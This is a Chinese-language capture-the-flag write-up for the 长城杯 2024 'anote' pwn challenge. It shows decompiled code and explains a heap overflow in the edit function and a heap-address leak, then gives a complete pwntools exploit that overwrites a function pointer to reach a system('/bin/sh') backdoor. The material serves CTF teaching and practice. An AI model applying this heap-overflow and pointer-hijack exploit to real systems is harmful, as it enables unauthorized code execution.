[长城杯 2024] anote

1778072434790-358d08c7-7472-48c9-bc11-7b71e138812a.png

1778073491506-9e542034-47aa-4713-b027-92e4aeb01317.png

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
int __cdecl main(int a1)
{
    int v1; // ebx
    unsigned int m; // eax
    int v3; // eax
    int v4; // eax
    int v5; // ebx
    int v6; // eax
    int v7; // eax
    std::istream *v8; // eax
    int v9; // eax
    std::istream *v10; // eax
    int idx; // [esp+0h] [ebp-68h] BYREF
    size_t n; // [esp+4h] [ebp-64h] BYREF
    int num; // [esp+8h] [ebp-60h] BYREF
    int count; // [esp+Ch] [ebp-5Ch]
    int n10; // [esp+10h] [ebp-58h]
    int v17[10]; // [esp+14h] [ebp-54h]
    char src[32]; // [esp+3Ch] [ebp-2Ch] BYREF
    unsigned int v19; // [esp+5Ch] [ebp-Ch]
    int *v20; // [esp+60h] [ebp-8h]

    v20 = &a1;
    v19 = __readgsdword(0x14u);
    count = 0;
    n10 = 10;
    while ( 1 )
        {
            menu();                                     // 1.add 2.show 3.edit 4.exit
/*
int menu()
{
    std::operator<<<std::char_traits<char>>(&std::cout, "1. add\n");
    std::operator<<<std::char_traits<char>>(&std::cout, "2. show content\n");
    std::operator<<<std::char_traits<char>>(&std::cout, "3. edit content\n");
    std::operator<<<std::char_traits<char>>(&std::cout, "4. exit\n");
    return std::operator<<<std::char_traits<char>>(&std::cout, "Choice>>")*/
            if ( count > 9 )
                break;
            std::istream::operator>>(&std::cin, &num);
            if ( num == 2 )                             // show
            {
                std::operator<<<std::char_traits<char>>(&std::cout, "index: ");
                std::istream::operator>>(&std::cin, &idx);// cin >> idx
                if ( idx >= count )
                {
                    v4 = std::operator<<<std::char_traits<char>>(&std::cout, "the item does not exist.");
                    std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
                    exit(0);
                }
                v5 = v17[idx];
                v6 = std::operator<<<std::char_traits<char>>(&std::cout, "gift: ");
                v7 = std::ostream::operator<<(v6, v5);
                std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);// std::cout << v5 << std::endl;
                sub_80489E8(v17[idx]);
/*
int __cdecl sub_80489E8(int a1)
{
  int v1; // ebx
  int v2; // eax
  int cout____idx; // eax
  int v4; // eax
  int cout____content; // eax

  v1 = *(_DWORD *)(a1 + 4);
  v2 = std::operator<<<std::char_traits<char>>(&std::cout, "index: ");
  cout____idx = std::ostream::operator<<(v2, v1);// cout << idx
  std::ostream::operator<<(cout____idx, &std::endl<char,std::char_traits<char>>);
  v4 = std::operator<<<std::char_traits<char>>(&std::cout, "content: ");
  cout____content = std::operator<<<std::char_traits<char>>(v4, a1 + 8);// cout << content
  return std::ostream::operator<<(cout____content, &std::endl<char,std::char_traits<char>>);
}
*/
            }
            else if ( num == 3 )              // edit
            {
                std::operator<<<std::char_traits<char>>(&std::cout, "index: ");
                v8 = (std::istream *)std::istream::operator>>(&std::cin, &idx);
                std::istream::get(v8);
                if ( idx >= count )
                {
                    v9 = std::operator<<<std::char_traits<char>>(&std::cout, "the item does not exist.");
                    std::ostream::operator<<(v9, &std::endl<char,std::char_traits<char>>);
                    exit(0);
                }
                std::operator<<<std::char_traits<char>>(&std::cout, "len: ");
                v10 = (std::istream *)std::istream::operator>>(&std::cin, &n);
                std::istream::get(v10);
                if ( (int)n > 40 )
                {
                    std::operator<<<std::char_traits<char>>(&std::cout, "too big!\n");
                    exit(0);
                }
                std::operator<<<std::char_traits<char>>(&std::cout, "content: ");
                std::istream::getline((std::istream *)&std::cin, src, 32);
                sub_8048A86(v17[idx], src, idx, n);
                (**(void (__cdecl ***)(int))v17[idx])(v17[idx]);
            }
            else
            {
                if ( num != 1 )                           // add
                    exit(0);
                v1 = operator new(0x1Cu);         
                for ( m = 0; m < 0x1C; m += 4 )
                    *(_DWORD *)(v1 + m) = 0;
                sub_8048DFC(v1);
                v3 = count++;
                v17[v3] = v1;
                std::operator<<<std::char_traits<char>>(&std::cout, "got new one!\n");
            }
        }
    std::operator<<<std::char_traits<char>>(&std::cout, "too much!!!\n");
    return 0;
}
  1. add >> 每次 add 都会申请一个大小为 0x20 的堆

1778074521722-c74cad59-be55-4e8c-b92d-88b847e66911.png

我们发现在 User_data 区一直存放着一个固定的指针指向 0x8048f48

1778074604831-4a63efb4-693e-4afb-b23f-c8fbc06fe7cf.png

跟进 __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc_w

1778074658304-669ed256-0854-48ef-ba98-b68fb3646c5a.png

1
2
3
4
int std::operator<<<std::char_traits<char>>()
{
  return std::operator<<<std::char_traits<char>>(&std::cout, "work done.\n");
}

提出思考:如果我们可以想办法篡改该指针,我们就可以劫持该指针指向 backdoor 获取 shell。

edit 要求我们修改的长度不超过 0x40,这个长度已经足够我们进行堆溢出了

gift 可以帮我们泄露堆地址。

backdoor

1
2
3
4
int sub_80489CE()
{
  return system("/bin/sh");
}

1778074148123-5764c73c-4b04-4735-8fb4-ebf24c31bda0.png

EXP 思路:

我们前面思考利用 user_data 的存放的指针去篡改 user_data 去指向 system(‘/bin/sh’); ,但是需要考虑到一个问题,即 0x8048f48 是一个二级指针,直接存放 backdoor 地址经过二次解析之后为 NULL,因此我们需要先把 backdoor 填入我们堆上的某地址,再篡改二级指针为刚才存入后门函数的地址,就可以进行二次解析获取 shell

1778075825996-d20110b6-2975-4265-94d2-5bb52f03ad99.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
context(arch="i386",log_level="debug")
p = process("./anote")
# p = remote("node1.anna.nssctf.cn",28196)
context.terminal=["tmux","splitw","-h"]

system = 0x80489CE
def add():       #max 9
    p.sendlineafter(">>",b"1")
def show(idx):
    p.sendlineafter(">>",b"2")
    p.sendlineafter("index:",str(idx).encode())

def edit(idx,size,content):    
    p.sendlineafter(">>",b"3")
    p.sendlineafter("index:",str(idx).encode())
    p.sendlineafter("len",str(size).encode())
    p.sendlineafter("content:",content)

def end():
    p.sendlineafter(">>",b"4")

def get_addr(p):
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))

add()
show(0)
p.recvuntil("gift: ")
leak_addr = int(p.recv(9),16)
info(f'leak_addr is {hex(leak_addr)}')

# gdb.attach(p)
# pause()
heap_base = leak_addr - 0x4810
log.success("heap_base: "+hex(heap_base))

# gdb.attach(p)
# pause()

add()
edit(0,28,p32(system)*5+p32(0x21)+p32(heap_base + 0x4818))
edit(1,10,b"aaaa")
p.interactive()

更新: 2026-05-06 22:01:08
原文: https://www.yuque.com/idcm/wnemg9/gh10oh8f8w93mcko